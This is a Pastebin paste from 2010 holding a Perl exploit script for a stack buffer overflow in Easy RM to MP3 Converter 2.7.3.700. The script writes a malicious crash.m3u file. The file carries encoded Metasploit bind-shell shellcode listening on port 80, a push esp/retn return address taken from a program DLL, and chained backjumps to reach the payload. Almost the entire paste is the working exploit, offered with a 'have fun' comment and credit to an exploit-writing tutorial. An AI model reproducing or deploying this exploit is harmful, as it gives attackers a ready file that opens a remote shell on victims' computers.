Guest User

backjumps

a guest
Sep 4th, 2010
539
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ####################################################################################################################
  2. # Easy RM to MP3 Converter Version 2.7.3.700 2006.09.29 - local exploit with the usage of some fancy backjumps
  3. # thx a lot to peter from corelan for his tut and his help to get this exploit working :)
  4. # visit ... http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  5. # have fun
  6. # m-1-k-3 (http://www.s3cur1ty.de)
  7. ####################################################################################################################
  8.  
  9. my $file= "crash.m3u";
  10.  
  11. #metasm > mov ebp,esp
  12. #"\x89\xe5"
  13. #add esp,-44c
  14. #81c4b4fbffff
  15. # ... fixes the crash of the shellcode ... a bit of magic from peter ;)
  16.  
  17. #msfpayload windows/shell_bind_tcp LPORT=80 R | /opt/metasploit34-dev/msf3/msfencode -b '\x00\xff' -e x86/alpha_mixed -t perl
  18. #[*] x86/alpha_mixed succeeded with size 745 (iteration=1)
  19.  
  20. $shell= "\x89\xe5\x81\xc4\xb4\xfb\xff\xff" . "\x90" x 5 .
  21. "\x89\xe5\xdb\xd9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" .
  22. "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
  23. "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
  24. "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
  25. "\x75\x4a\x49\x49\x6c\x4a\x48\x4d\x59\x43\x30\x43\x30\x45" .
  26. "\x50\x43\x50\x4e\x69\x4a\x45\x46\x51\x4b\x62\x42\x44\x4e" .
  27. "\x6b\x51\x42\x44\x70\x4e\x6b\x51\x42\x44\x4c\x4e\x6b\x50" .
  28. "\x52\x44\x54\x4e\x6b\x50\x72\x51\x38\x46\x6f\x4f\x47\x43" .
  29. "\x7a\x51\x36\x46\x51\x4b\x4f\x46\x51\x4f\x30\x4c\x6c\x47" .
  30. "\x4c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4b\x71\x4a" .
  31. "\x6f\x44\x4d\x45\x51\x48\x47\x4a\x42\x4a\x50\x50\x52\x42" .
  32. "\x77\x4e\x6b\x42\x72\x46\x70\x4e\x6b\x43\x72\x47\x4c\x43" .
  33. "\x31\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4c\x45\x49\x50\x50" .
  34. "\x74\x51\x5a\x45\x51\x4a\x70\x50\x50\x4e\x6b\x47\x38\x46" .
  35. "\x78\x4c\x4b\x43\x68\x45\x70\x43\x31\x4e\x33\x49\x73\x45" .
  36. "\x6c\x42\x69\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44" .
  37. "\x71\x4b\x4f\x44\x71\x4f\x30\x4e\x4c\x4f\x31\x48\x4f\x46" .
  38. "\x6d\x45\x51\x4f\x37\x50\x38\x4b\x50\x50\x75\x49\x64\x45" .
  39. "\x53\x51\x6d\x49\x68\x45\x6b\x43\x4d\x44\x64\x43\x45\x49" .
  40. "\x72\x43\x68\x4e\x6b\x51\x48\x45\x74\x47\x71\x48\x53\x50" .
  41. "\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46" .
  42. "\x61\x49\x43\x4c\x4b\x46\x64\x4e\x6b\x45\x51\x48\x50\x4f" .
  43. "\x79\x42\x64\x45\x74\x47\x54\x43\x6b\x51\x4b\x43\x51\x51" .
  44. "\x49\x51\x4a\x42\x71\x49\x6f\x49\x70\x46\x38\x43\x6f\x42" .
  45. "\x7a\x4e\x6b\x42\x32\x48\x6b\x4b\x36\x51\x4d\x45\x38\x45" .
  46. "\x63\x50\x32\x47\x70\x45\x50\x45\x38\x51\x67\x51\x63\x45" .
  47. "\x62\x43\x6f\x46\x34\x51\x78\x50\x4c\x43\x47\x46\x46\x44" .
  48. "\x47\x49\x6f\x4b\x65\x4e\x58\x4e\x70\x47\x71\x43\x30\x47" .
  49. "\x70\x47\x59\x4b\x74\x43\x64\x42\x70\x51\x78\x51\x39\x4b" .
  50. "\x30\x50\x6b\x47\x70\x49\x6f\x4b\x65\x46\x30\x46\x30\x42" .
  51. "\x70\x46\x30\x51\x50\x50\x50\x43\x70\x42\x70\x51\x78\x49" .
  52. "\x7a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x4b\x65\x4d\x59\x4f" .
  53. "\x37\x44\x71\x49\x4b\x51\x43\x51\x78\x43\x32\x47\x70\x43" .
  54. "\x30\x50\x50\x4b\x39\x4d\x36\x50\x6a\x44\x50\x50\x56\x51" .
  55. "\x47\x51\x78\x4b\x72\x49\x4b\x50\x37\x42\x47\x49\x6f\x4b" .
  56. "\x65\x46\x33\x51\x47\x42\x48\x4c\x77\x4b\x59\x47\x48\x4b" .
  57. "\x4f\x4b\x4f\x4b\x65\x50\x53\x51\x43\x51\x47\x42\x48\x51" .
  58. "\x64\x4a\x4c\x47\x4b\x4b\x51\x4b\x4f\x4e\x35\x42\x77\x4f" .
  59. "\x79\x49\x57\x50\x68\x50\x75\x42\x4e\x50\x4d\x50\x61\x49" .
  60. "\x6f\x4a\x75\x42\x48\x42\x43\x50\x6d\x45\x34\x45\x50\x4e" .
  61. "\x69\x49\x73\x46\x37\x46\x37\x43\x67\x45\x61\x4a\x56\x51" .
  62. "\x7a\x47\x62\x42\x79\x42\x76\x49\x72\x49\x6d\x51\x76\x4a" .
  63. "\x67\x42\x64\x44\x64\x47\x4c\x45\x51\x45\x51\x4e\x6d\x42" .
  64. "\x64\x44\x64\x44\x50\x4f\x36\x43\x30\x42\x64\x42\x74\x46" .
  65. "\x30\x51\x46\x42\x76\x51\x46\x43\x76\x51\x46\x50\x4e\x42" .
  66. "\x76\x51\x46\x43\x63\x50\x56\x42\x48\x50\x79\x4a\x6c\x47" .
  67. "\x4f\x4e\x66\x4b\x4f\x4b\x65\x4c\x49\x49\x70\x42\x6e\x46" .
  68. "\x36\x43\x76\x49\x6f\x46\x50\x43\x58\x46\x68\x4e\x67\x45" .
  69. "\x4d\x45\x30\x4b\x4f\x4e\x35\x4d\x6b\x4a\x50\x4f\x45\x4f" .
  70. "\x52\x46\x36\x45\x38\x4e\x46\x4e\x75\x4d\x6d\x4f\x6d\x4b" .
  71. "\x4f\x4a\x75\x47\x4c\x47\x76\x51\x6c\x46\x6a\x4b\x30\x4b" .
  72. "\x4b\x4d\x30\x50\x75\x47\x75\x4d\x6b\x43\x77\x45\x43\x43" .
  73. "\x42\x50\x6f\x43\x5a\x45\x50\x43\x63\x49\x6f\x4e\x35\x45" .
  74. "\x5a\x41\x41";
  75.  
  76.  
  77. $backjump1= "\xE9\xE9\xFC\xFF\xFF"; # 5 bytes
  78.  
  79. my $junk= "\x41" x 25026 .     
  80. "\x44" x 125 . "\x90" x 10 . $shell . "\x90" x 7# stage 3 - shellcode
  81. "\x90" x 20 . $backjump1 . "\x90" x 105 .       # stage 2 - far backjmp
  82. "\x58\xb0\x01\x10" .            # push esp - retn
  83. "\x90" x 4 .                # some garbage
  84. "\xeb\x80" .                # stage 1 - short backjmp
  85. "\x00" x 4 . "\x44" x 1930;     # we would not use this buffer!
  86.  
  87. #msrmfilter03.dll - no dll rebase
  88. #1001B058   54               PUSH ESP
  89. #1001B059   C3               RETN
  90.  
  91. open($FILE,">$file");
  92. print $FILE "$junk";
  93. close($FILE);
  94. print "m3u File Created successfully\n";
RAW Paste Data